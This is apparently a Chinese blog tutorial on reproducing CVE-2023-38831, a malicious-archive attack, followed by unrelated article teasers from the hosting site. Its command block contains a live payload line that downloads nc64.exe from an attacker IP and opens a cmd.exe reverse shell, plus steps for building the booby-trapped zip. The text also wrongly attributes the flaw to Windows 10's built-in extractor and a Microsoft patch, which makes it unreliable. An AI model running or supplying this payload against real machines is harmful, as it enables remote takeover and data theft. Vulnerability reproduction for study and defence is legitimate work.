CVE-2023-38831 漏洞复现:win10 压缩包挂马攻击剖析

目录

前言

漏洞介绍

漏洞原理

产生条件

影响范围

防御措施

复现步骤

环境准备

具体操作


前言

在网络安全这片没有硝烟的战场上,新型漏洞如同隐匿的暗箭,时刻威胁着我们的数字生活。其中,CVE - 2023 - 38831 这个关联 Win10 压缩包挂马攻击的漏洞,自曝光以来便引发了安全界的高度关注。深入探究并复现这一漏洞,不仅能让我们洞悉攻击者的手段,更能助力我们筑牢防线,抵御此类威胁。

漏洞介绍

CVE - 2023 - 38831 是 2023 年披露的一个高危安全漏洞,主要影响 Windows 10 系统。攻击者利用这一漏洞,精心炮制恶意压缩包。当用户在 Windows 10 系统上解压这类特制压缩包时,恶意代码会在无需用户额外操作的情况下自动执行。这就如同打开了潘多拉魔盒,攻击者借此实现挂马攻击,全面控制用户计算机,肆意窃取敏感信息,甚至进行更恶劣的破坏活动。

漏洞原理

该漏洞的根源在于 Windows 10 系统解压程序的机制缺陷。当处理特定格式压缩包时,解压程序在解压路径和文件解析环节存在安全隐患。攻击者巧妙利用这一漏洞,在解压路径中植入恶意代码。一旦解压程序按照错误路径解析文件,恶意代码便会顺势执行,将系统控制权拱手让给攻击者,进而为后续的恶意操作大开方便之门。

产生条件

  1. 操作系统环境:漏洞主要针对未安装相关安全补丁的 Windows 10 系统。尽管不同版本的 Windows 10 受影响程度略有不同,但只要未修复此漏洞,就如同在网络世界中裸奔,随时面临被攻击的风险。
  2. 解压操作:用户解压包含恶意代码的特制压缩包是触发漏洞的关键。这类压缩包经过攻击者精心设计,充分利用系统解压程序的漏洞,确保恶意代码能在解压瞬间被激活。
  3. 解压软件:无论是 Windows 10 系统自带的解压程序,还是存在相同漏洞的第三方解压软件,都可能成为攻击者的突破口。例如一些常见的免费解压软件,若未及时更新修复漏洞,就极易沦为攻击目标。

影响范围

Windows 10 系统在全球范围内广泛应用,从个人用户的日常办公,到企业办公环境的运转,再到教育机构的教学场景,几乎无处不在。这意味着只要使用未打补丁的 Windows 10 系统解压恶意压缩包,大量计算机都将暴露在风险之下,面临被挂马、数据泄露、系统被控制等严重威胁,可能导致个人隐私泄露、企业商业机密被盗取、教育资料丢失等一系列严重后果。

防御措施

  1. 及时更新系统补丁:微软已针对 CVE - 2023 - 38831 漏洞发布安全补丁,用户务必尽快安装,可通过 Windows Update 自动更新功能,也可手动下载安装,确保系统安全性。
  2. 谨慎解压未知来源压缩包:对于来源不明的压缩包,尤其是从不可信网站、邮件或即时通讯工具接收的,切勿轻易解压。解压前,先使用可靠的杀毒软件进行全面扫描,确认安全后再操作。
  3. 使用安全的解压软件:优先选择知名、更新及时的解压软件,并定期更新软件版本。避免使用来源不明或已被曝光存在安全漏洞的解压软件。同时,部分解压软件提供安全解压模式,建议启用,以降低风险。

复现步骤

环境准备

  1. 虚拟机:准备一台安装 Windows 10 系统的虚拟机,并确保未安装 CVE - 2023 - 38831 漏洞补丁。可借助虚拟机软件,如 VMware Workstation 或 VirtualBox 来创建。
  2. 攻击机:选用一台安装 Kali Linux 系统的计算机作为攻击机。Kali Linux 作为专业的网络安全测试操作系统,集成了大量实用的漏洞利用工具。
  3. 漏洞利用工具:在 Kali Linux 中,借助 Metasploit 框架进行漏洞复现。Metasploit 是一款强大的开源安全漏洞检测与利用工具,拥有丰富的漏洞利用模块。

具体操作

unzip winrar漏洞攻击脚本.zip     #解压攻击脚本
cd winrar漏洞攻击脚本            #切换到攻击脚本目录下
python -m http.server           #生成一个代码目录
nc -lnvp 6666                   #开启监听端口
vim script.bat                  #进入攻击脚本目录编辑文件,设置ip地址和指定端口
curl http://10.0.0.103:8000/nc64.exe -O nc64.exe & nc64.exe 10.0.0.103 6666 -e cmd.exe -d & test.png
python make.py test.png script.bat bianlianghot.zip     #生成病毒压缩包
  1. 启动 Metasploit 框架:在 Kali Linux 系统终端中输入 “msfconsole” 命令,启动 Metasploit 框架。
  2. 上传攻击脚本并解压:将攻击脚本压缩包进行上传并解压,并生成一个代码目录
  3. 此时在开启一个shell设置监听端口:设置本地监听端口
  4. 进入攻击脚本目录编辑文件:进入攻击目录编辑文件设置ip地址和端口信息
  5. 生成病毒压缩包:再打开一个终端生成病毒压缩包
  6. 上传压缩包到目标靶机:将恶意的病毒压缩包上传到目标靶机
  7. 触发漏洞:在 Windows 10 虚拟机中找到传输过来的恶意压缩包,双击解压。解压过程中,攻击机的 Metasploit 框架会监听到来自虚拟机的连接请求,从而实现对 Windows 10 系统的远程控制。此时,可在攻击机上执行各种命令,如查看文件、窃取数据等,模拟攻击者的操作流程。

通过以上复现步骤,我们能直观感受到 CVE - 2023 - 38831 漏洞的巨大危害。在现实网络环境中,我们必须时刻保持警惕,严格落实各项防御措施,切实保障系统安全。如果你对网络安全领域感兴趣,欢迎持续关注相关内容,一同探索更多网络安全知识。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:/a/960365.html

如若内容造成侵权/违法违规/事实不符,请联系我们进行投诉反馈qq邮箱809451989@qq.com,一经查实,立即删除!

相关文章

链表排序--(奇数位是升序,偶数位是降序)

题目描述 对一个单链表进行排序,但这个链表有一个特殊的结构: 奇数位是升序:链表中位于奇数位置的节点是按升序排列的。例如,如果链表的第1个节点的值是1,第3个节点的值是3,第5个节点的值是5,那…

在无sudo权限Linux上安装 Ollama 并使用 DeepSeek-R1 模型

本教程将指导你如何在 Linux 系统上安装 Ollama(一个本地运行大型语言模型的工具),并加载 DeepSeek-R1 模型。DeepSeek-R1 是一个高性能的开源语言模型,适用于多种自然语言处理任务。 DeepSeek-R1 简介 DeepSeek-R1 是 DeepSeek …

arduino学习

一、log日志 只看自己 看指定 看错误日志 二、布局 重要:新建activity时需要的配置 若一个工程中有多个activity,需要修改开启activity属性、总容器标签、debug启动activity。下面流程内截图activity不一致,根据自己新建的activity配置&am…

obsidian插件——Metadata Hider

原本是要找导出图片时显示属性的插件,奈何还没找到,反而找到了可以隐藏属性的插件。唉,人生不如意,十之八九。 说一下功能: 这个插件可以把obsidian的文档属性放在右侧显示,或者决定只显示具体几项属性&a…

SimpleFOC STM32教程10|基于STM32F103+CubeMX,速度闭环控制(有电流环)

导言 SimpleFOC STM32教程09|基于STM32F103CubeMX,ADC采样相电流 如上图所示, 增加了电流环. 效果如下: 20250123-200906 RTT 如上图所示,三相占空比依然是马鞍波。当我用手去给电机施加阻力时,PID要维持目标转速&am…

Qt 5.14.2 学习记录 —— 이십일 Qt网络和音频

文章目录 1、UDP带有界面的Udp服务器(回显服务器) 2、TCP回显服务器 3、HTTP客户端4、音频 和Linux的网络一样,Qt封装了Linux的网络API,即Socket API。网络编程是在应用层写,需要传输层支持,传输层有UDP和T…

【C语言基础】编译并运行第一个C程序

博主未授权任何人或组织机构转载博主任何原创文章,感谢各位对原创的支持! 博主链接 博客内容主要围绕: 5G/6G协议讲解 高级C语言讲解 Rust语言讲解 文章目录 编译并运行第一个C程序一、编译上面的程序二、运行上面的程序…

TikTok 推出了一款 IDE,用于快速构建 AI 应用

字节跳动(TikTok 的母公司)刚刚推出了一款名为 Trae 的新集成开发环境(IDE)。 Trae 基于 Visual Studio Code(VS Code)构建,继承了这个熟悉的平台,并加入了 AI 工具,帮助开发者更快、更轻松地构建应用——有时甚至无需编写任何代码。 如果你之前使用过 Cursor AI,T…

HarmonyOS简介:HarmonyOS核心技术理念

核心理念 一次开发、多端部署可分可合、自由流转统一生态、原生智能 一次开发、多端部署 可分可合 自由流转 自由流转可分为跨端迁移和多端协同两种情况 统一生态 支持业界主流跨平台开发框架,通过多层次的开放能力提供统一接入标准,实现三方框架快速…

STM32 按键密码系统的实现

本次基于STM32F407开发板,来实现密码系统,输入四位密码,密码正确时LED1亮,密码错误时四个LED灯双闪。 LED双闪代码 简单的逻辑,让四个LED灯先亮然后再延时一会LED灯灭,循环4此实现双闪的效果。 按键密码的…

【C++ 动态规划】1024. 视频拼接|1746

本文涉及知识点 C动态规划 LeetCode1024. 视频拼接 你将会获得一系列视频片段,这些片段来自于一项持续时长为 time 秒的体育赛事。这些片段可能有所重叠,也可能长度不一。 使用数组 clips 描述所有的视频片段,其中 clips[i] [starti, end…

A7. Jenkins Pipeline自动化构建过程,可灵活配置多项目、多模块服务实战

服务容器化构建的环境配置构建前需要解决什么下面我们带着问题分析构建的过程:1. 如何解决jenkins执行环境与shell脚本执行环境不一致问题?2. 构建之前动态修改项目的环境变量3. 在通过容器打包时避免不了会产生比较多的不可用的镜像资源,这些资源要是不及时删除掉时会导致服…

Oracle-Java JDBC 连接超时之后的认知纠正

背景 偶然读到熊老师的文章《老熊的三分地-JDBC中语句超时与事务》了解到:JAVA代码的最后正常断开数据库连接,在默认情况下,正常断开的数据库连接会自动提交没有提交的事务。   通过文章的测试JAVA程序,可以表明,JDB…

redis的分片集群模式

redis的分片集群模式 1 主从哨兵集群的问题和分片集群特点 主从哨兵集群可应对高并发写和高可用性,但是还有2个问题没有解决: (1)海量数据存储 (2)高并发写的问题 使用分片集群可解决,分片集群…

【Linux】 冯诺依曼体系与计算机系统架构全解

Linux相关知识点可以通过点击以下链接进行学习一起加油!初识指令指令进阶权限管理yum包管理与vim编辑器GCC/G编译器make与Makefile自动化构建GDB调试器与Git版本控制工具Linux下进度条 冯诺依曼体系是现代计算机设计的基石,其统一存储和顺序执行理念推动…

【论文复现】基于维度狩猎学习的改进秃鹰搜索算法用于自动驾驶问题

目录 1.摘要2.秃鹰搜索算法BES原理3.改进策略4.结果展示5.参考文献6.代码获取 1.摘要 由于道路曲率穿透和参数不确定性带来的侧向偏差,自动驾驶车辆控制器面临提供准确、快速响应及小幅超调等性能挑战。本文提出了一种基于维度狩猎学习(DLH)…

【阅读笔记】基于整数+分数微分的清晰度评价算子

本文介绍的是一种新的清晰度评价算子,整数微分算子分数微分算子 一、概述 目前在数字图像清晰度评价函数中常用的评价函数包括三类:灰度梯度评价函数、频域函数和统计学函数,其中灰度梯度评价函数具有计算简单,评价效果好等优点…

电路研究9.2——合宙Air780EP使用AT指令

这里正式研究AT指令的学习了,之前只是接触的AT指令,这里则是深入分析AT指令了。 软件的开发方式: AT:MCU 做主控,MCU 发 AT 命令给模组的开发方式,模组仅提供标准的 AT 固件, 所有的业务控制逻辑…

输入带空格的字符串,求单词个数

输入带空格的字符串&#xff0c;求单词个数 __ueooe_eui_sjje__ ---->3syue__jdjd____die_ ---->3shuue__dju__kk ---->3 #include <stdio.h> #include <string.h>// 自定义函数来判断字符是否为空白字符 int isSpace(char c) {return c || c \t || …

基于Mybatis继承AbstractRoutingDataSource使用自定义注解实现动态数据源

一&#xff1a;实现 方式一&#xff1a;继承AbstractRoutingDataSource使用自定义注解实现 环境&#xff1a;springboot3 MyBatis3 mysql-connector8 DataSourceKeyEnum枚举类 有几个数据源就配置几个枚举类&#xff0c;和数据源数量一一对应 class DataSourceKeyEnum{D…